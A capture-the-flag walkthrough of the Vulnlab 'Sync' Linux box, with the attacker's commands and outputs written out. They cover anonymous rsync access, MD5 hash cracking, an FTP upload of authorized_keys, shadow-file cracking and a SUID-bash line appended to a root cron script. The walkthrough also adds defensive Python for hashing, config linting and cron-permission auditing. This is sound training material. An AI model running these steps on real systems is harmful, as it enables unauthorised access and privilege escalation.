vulnlab sync
An easy Linux box.
nmap scan
# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds
rsync -av --list-only rsync://10.10.93.172/
The httpd module is readable without any credentials, so we pull it with rsync to get the website's source:
rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared
The stored login hash is computed over the concatenation of three values, $secure|$username|$password, where the $secure value acts as the salt. That is why it can be written for hashcat as hash:salt, with the salt being "$secure|$username|":
a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|
hashcat mode 20 (md5($salt.$pass)) cracks this one:
hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
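As an added illustration (not part of the original writeup), the following Python shows why the hash line above is laid out as hash:salt for mode 20 and why the scheme is weak: the application computes a single MD5 over `$secure|$username|$password`, so with the salt stored in the clear each guess costs one fast MD5. The second half shows the replacement a defender would ship, a memory-hard scrypt hash with a random per-user salt from the standard library. The line parsed here is the one from the writeup; the scrypt parameters and the `scrypt$n$r$p$salt$key` storage layout are my own choices.

```python
import hashlib
import hmac
import os

# The hash line from the writeup, in hashcat's <md5>:<salt> layout. The salt
# is "<secure>|<username>|", so md5(salt + password) equals the app's scheme.
SAMPLE_LINE = "a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|"


def parse_hash_line(line: str) -> tuple[str, str, str]:
    """Split a hash:salt line into (digest, secure, username)."""
    digest, salt = line.strip().split(":", 1)
    secure, username, trailing = salt.split("|")
    if trailing != "" or len(digest) != 32:
        raise ValueError("unexpected hash line layout")
    return digest, secure, username


def legacy_login_hash(secure: str, username: str, password: str) -> str:
    """The application's scheme: one MD5 over '$secure|$username|$password'.
    The salt stops precomputed tables, but every guess is a single fast MD5,
    which is why a wordlist run with hashcat mode 20 finishes quickly."""
    return hashlib.md5(f"{secure}|{username}|{password}".encode()).hexdigest()


def legacy_verify(line: str, password: str) -> bool:
    """Constant-time comparison of a candidate password against a stored line."""
    digest, secure, username = parse_hash_line(line)
    return hmac.compare_digest(digest, legacy_login_hash(secure, username, password))


# Hardened replacement (my own layout, not the box's code): scrypt with a
# random 16-byte salt and tunable cost, stored self-describing so the cost
# parameters can be raised later without breaking old records.
def scrypt_hash(password: str, *, n: int = 2**14, r: int = 8, p: int = 1) -> str:
    salt = os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=n, r=r, p=p, dklen=32)
    return f"scrypt${n}${r}${p}${salt.hex()}${key.hex()}"


def scrypt_verify(stored: str, password: str) -> bool:
    _, n, r, p, salt_hex, key_hex = stored.split("$")
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    print(parse_hash_line(SAMPLE_LINE))
    record = scrypt_hash("example-only")
    print(record, scrypt_verify(record, "example-only"))
```

The point of `legacy_verify` is only to make the construction explicit; the fix is to stop storing MD5 at all and move users to `scrypt_hash` on their next successful login.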
With the cracked password we can FTP to the box, create a .ssh folder in the home directory, and upload our authorized_keys file (id_rsa.pub) there:
┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.
ssh -i ed_25519 triss@10.10.93.172
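Two service misconfigurations carry the foothold on this box: an rsync module that anyone can list and read, and an FTP daemon that lets local users write into their real home directory, which makes ~/.ssh/authorized_keys reachable with nothing more than a password. The following Python is an added example (not code from the writeup or from the box) that lints rsyncd.conf and vsftpd.conf text for exactly those conditions. The four sample configs are constructed; the option names (`auth users`, `secrets file`, `hosts allow`, `list`, `write_enable`, `chroot_local_user`, `local_root`) are real rsync and vsftpd options.

```python
# Constructed sample configs. The weak pair reproduces the two conditions seen
# on the box; the hardened pair shows the settings that close them.
WEAK_RSYNCD = """\
uid = nobody
gid = nogroup
[httpd]
    path = /opt/httpd
    comment = web root
    read only = yes
"""

HARDENED_RSYNCD = """\
uid = nobody
gid = nogroup
list = no
[httpd]
    path = /opt/httpd
    read only = yes
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.10.0.0/16
"""

WEAK_VSFTPD = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
"""

HARDENED_VSFTPD = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
local_root=/srv/ftp/$USER
"""


def _parse_rsyncd(text: str):
    """rsyncd.conf: global 'key = value' lines, then [module] sections that
    inherit any global setting they do not override."""
    global_opts, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
            continue
        key, _, value = line.partition("=")
        target = modules[current] if current is not None else global_opts
        target[key.strip().lower()] = value.strip()
    return global_opts, modules


def lint_rsyncd(text: str) -> list[str]:
    global_opts, modules = _parse_rsyncd(text)
    findings = []
    for name, opts in modules.items():
        def get(key, _opts=opts):
            return _opts.get(key, global_opts.get(key))
        if get("auth users") is None:
            findings.append(f"rsyncd: module [{name}] has no 'auth users'; anyone reaching port 873 can pull it")
        if get("hosts allow") is None:
            findings.append(f"rsyncd: module [{name}] has no 'hosts allow' restriction")
        if (get("list") or "yes").lower() != "no":
            findings.append(f"rsyncd: module [{name}] shows up in anonymous module listings (list = yes)")
    return findings


def _parse_vsftpd(text: str) -> dict:
    """vsftpd.conf: flat key=value lines; values compared case-insensitively."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        opts[key.strip().lower()] = value.strip().upper()
    return opts


def lint_vsftpd(text: str) -> list[str]:
    opts = _parse_vsftpd(text)
    findings = []
    if opts.get("anonymous_enable") == "YES":
        findings.append("vsftpd: anonymous logins enabled")
    if (opts.get("write_enable") == "YES" and opts.get("local_enable") == "YES"
            and opts.get("chroot_local_user") != "YES"):
        findings.append("vsftpd: local users can write to their real home directory over FTP, "
                        "so a leaked password also yields SSH via ~/.ssh/authorized_keys")
    return findings


if __name__ == "__main__":
    for label, fn, cfg in [("weak rsyncd", lint_rsyncd, WEAK_RSYNCD),
                           ("hardened rsyncd", lint_rsyncd, HARDENED_RSYNCD),
                           ("weak vsftpd", lint_vsftpd, WEAK_VSFTPD),
                           ("hardened vsftpd", lint_vsftpd, HARDENED_VSFTPD)]:
        print(label, fn(cfg) or "clean")
```

Point the two functions at the real files (`/etc/rsyncd.conf`, `/etc/vsftpd.conf`) to use it on a host; the hardened vsftpd sample pairs `chroot_local_user` with a `local_root` outside the home directory, so uploads never land where sshd reads keys.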
Another user in /etc/passwd is jennifer; su jennifer works with the same password as triss.
There is a zip file in the /backup directory, a backup archive owned by root. Run pspy to watch what creates it:
timeout 60s ./pspy64
Getting the zip:
wget http://10.8.2.138:8000/1698154321.zip
The archive contains copies of passwd and shadow; combine them with unshadow:
$ unshadow passwd shadow > unshadow
Crack it with john:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow
The user sa has write permission on /usr/local/bin/backup.sh, the script root runs to produce those backups. Appending to it is enough:
echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash
Wait a minute for the backup job to run again as root, then:
/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#
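The root cause of the privilege escalation is a script that root executes on a schedule while a non-root account can modify it. The check below is an added example (not from the writeup) that a defender can run over the paths a cron job or timer executes: it reports any file that is owned by someone other than root, group- or world-writable, a symlink, or sitting in a world-writable directory without the sticky bit. The writeup does not show the exact mode of backup.sh, so the `(1001, 1001, 0o664)` case in the demo is a constructed stand-in for "writable by sa".

```python
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    reason: str


def writable_by_non_root(uid: int, gid: int, mode: int) -> list[str]:
    """Pure check on owner/group/permission bits. Returns the reasons an
    account other than root could change the file; gid 0 is treated as trusted."""
    reasons = []
    if uid != 0:
        reasons.append(f"owned by uid {uid}, not root")
    if mode & stat.S_IWGRP and gid != 0:
        reasons.append(f"group-writable (gid {gid})")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_paths(paths) -> list[Finding]:
    """Stat each path that root is going to execute and collect findings.
    Missing files are skipped (the cron line itself would then be the bug)."""
    findings = []
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        if stat.S_ISLNK(st.st_mode):
            findings.append(Finding(p, "is a symlink; its target may be controlled by another user"))
            continue
        for reason in writable_by_non_root(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode)):
            findings.append(Finding(p, reason))
        # A writable parent directory lets a user replace the file wholesale,
        # so check it too (sticky bit makes /tmp-style directories acceptable).
        parent = os.path.dirname(p) or "."
        pmode = stat.S_IMODE(os.stat(parent).st_mode)
        if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
            findings.append(Finding(p, f"parent directory {parent} is world-writable without sticky bit"))
    return findings


def demo() -> list[Finding]:
    """Create a throwaway script with loose permissions and audit it."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backup.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho backup\n")
        os.chmod(script, 0o666)  # constructed: deliberately too permissive
        return audit_paths([script])


if __name__ == "__main__":
    # Constructed stand-in for the box: backup.sh owned by sa (uid 1001), group-writable.
    print(writable_by_non_root(1001, 1001, 0o664))
    for f in demo():
        print(f.path, "->", f.reason)
```

For real use, feed `audit_paths` the command paths parsed out of /etc/crontab, /etc/cron.d and root's crontab; anything it reports should be made root-owned with mode 0755 (or 0750) before the next run.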
That's all.